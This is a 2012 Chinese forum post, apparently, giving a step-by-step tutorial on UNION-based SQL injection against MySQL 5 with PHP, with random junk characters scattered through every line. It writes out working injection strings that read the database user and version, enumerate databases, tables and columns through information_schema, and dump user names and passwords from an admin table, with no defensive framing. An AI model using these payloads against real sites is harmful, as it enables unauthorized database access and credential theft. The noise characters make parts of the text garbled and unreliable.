& @! @2 H* b' }# V
教程内容:Mysql 5+php 注入
/ d& B1 \" M3 O- B8 u9 g0 U3 m9 I. B5 P) B, f
1 S8 h( ]5 h6 L& I) M& R
( i% l1 U, d( M3 W6 ~ S一.查看MYSQL基本信息(库名,版本,用户)" n) [: d# V- V7 u
$ C( G( U9 ?) y$ L+ \1 L' xand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
( t/ H) ~5 U7 b' ~! n. m5 M# B$ `4 n; [; F% o$ q
二.查数据库! N5 B/ Z/ X% K' \( [ T, D
( {/ l1 T9 F4 @; P$ Rand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*! O6 T% f }& P$ p: k% v& v
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
W9 m" p$ H, J+ p
! h; Z. w, H$ x. Q" A三.暴表$ r" Z1 j+ y0 o T
, g W$ ]- ?' J. H( H$ O( y* w8 {' b8 W
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*9 }1 b% y$ n% G# y4 N. N* Q
% s9 B* t- N# B9 i7 L
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。) }+ z( h. j: B. s5 R/ F \
0 p, X5 ^; j6 b0 G
四.暴字段
: N A" b7 ?5 g: g6 Q2 X
* b9 c/ w8 o: q& F* M7 aand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- S0 Y+ w) f! z0 Q1 K8 v9 M
0 y/ K3 Z0 b4 t7 glimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。 S) V+ m, D% A6 i
, |6 g, h) C' z# x/ |
五.暴数据! I) U% {9 u+ ?4 W1 b! i( S. w! d
& e: K, e$ B& ]2 f! H: o! b0 L
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
0 q% R8 u, ]! o3 H" j ^" Y! |3 N' v0 F( r
/ F8 e6 G; g- }- i" d这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
( C1 f. M! e g/ m* ^3 ? |
发表于 2012-9-13 16:27:53
收藏
支持
反对